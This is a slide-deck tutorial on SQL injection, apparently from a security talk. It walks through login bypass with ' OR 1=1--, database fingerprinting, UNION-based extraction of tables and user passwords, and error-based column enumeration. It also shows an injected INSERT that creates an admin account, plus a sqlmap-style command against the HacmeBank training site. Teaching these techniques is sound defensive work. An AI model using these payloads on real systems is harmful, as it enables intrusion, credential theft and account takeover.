  • 7. FACT Amongst Codd's rules for a Relational Database: Metadata must be stored in the database just as regular data is
  • 8. SQL Injection is a technique where an attacker creates or alters existing SQL commands Expose hidden data (e.g. steal all the records from the tables) Override the data (e.g. Administrators password) Execute dangerous system level commands on the database host
  • 9. SQL Injection Login Example SELECT * FROM Users WHERE Username=‘username’AND Password=‘password’ If the user entered Elprince, Elprince123the query will be SELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
  • 10. SQL Injection Ex Cont Suppose the User entered ‘ OR 1=1--, 123 the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--’ AND Password=‘123’ -- comments everything afterwards, so the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--
  • 11. This is not enough You can enhance the injection to login with the administrator account Enter ‘ or 1=1 ORDER BY 1--, abc the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
  • 12. Finding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotations and observe the result
  • 13. Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %
  • 14. Finding SQL Injection Bugs For numeric data, if the original value was 2 try submitting 1+1 or 3-1 If successful try using SQL-specific keywords, e.g. 67-ASCII(‘A’) If single quotes are filtered try 51-ASCII(1) [note ASCII(1)=49]
  • 15. Identify the database engine The error messages will let us know the DB engine We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
  • 16. Identify the database engine Use specific characters or commands: String concatenation in different DB engines : ‘||’FOO : ‘+’FOO : ‘‘FOO [note the space btw the 2 quotes]
  • 17. Identify User privileges ‘ and 1 in (SELECTuser) -- ‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
  • 18. Injection in Search Fields 35
  • 22. I receive this error Error states that it’s
  • 23. Suppose I still don’t know the DB engine, Is it Note: string concatenation in is +
  • 24. I’m having an error, it’s not
  • 25. Is it Note: string concatenation in Oracle is ||
  • 27. Is it Note: string concatenation in MySQL is blank space
  • 29. The query in the backend is something like that SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE…. A possible location for my input
  • 30. The Strategy Get number of items after the SELECT statement How many items are here SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
  • 31. The Strategy 2. Identify the location of the STRINGS in the SELECT Statement Which of those are strings SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
  • 32. The Strategy 3. Get the Structure of the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
  • 33. The Strategy 4. Get the data from the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
  • 34. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 35. 1. Get number of items after the SELECT statement
  • 36. Error
  • 38. Result Why the results are less?
  • 42. Result How many columns do we have in the SELECT statement
  • 43. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 44. 2. Identify the location of the STRINGS in the SELECT Statement 1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  • 46. Get the Strings and the locations 1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
  • 48. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 49. 3. Get the Structure of the database 1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
  • 51. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 52. Next Queries 1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'# 1234') UNION SELECT NULL,NULL,NULL,username,password,null,null FROM users WHERE id<100# ……. Continue till you get all the tables
  • 53. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 54. Injection with errors
  • 55. Gives me an Error
  • 56. Getting version ' and 1 in (SELECT @@version)--
  • 57. Gives me this error
  • 59. I get this Error
  • 60. Getting next column name ' group by login.firstname having 1=1--
  • 61. I get this error
  • 62. Again ' group by login.firstname, login.surname having 1=1--
  • 63. Error reveals new column name
  • 64. Again ' group by login.firstname, login.surname,login.username having 1=1--
  • 68. Continue… After getting all of the columns I found a field called IsAdmin-that’s my goal - Putting the following query creates an admin account on the application ‘; INSERT INTO Login (username,pwd,IsAdmin,……) VALUES (‘Administrator’,’******’,TRUE,…..)
  • 69. Not all Injections generate errors
  • 71. You Were GREAT Audience
  • 72. Thank You @mostafasiraj Mostafa Siraj

Editor's Notes

  1. -u &quot;http://rajpc/HacmeBank_v2_Website/aspx/Main.aspx?function=TransactionDetails&amp;account_no=5204320422040001&quot; --cookie &quot;ASP.NET_SessionId=fadqryjsmlb52y45hztq0pvc; CookieLoginAttempts=5; Admin=false&quot; -p account_no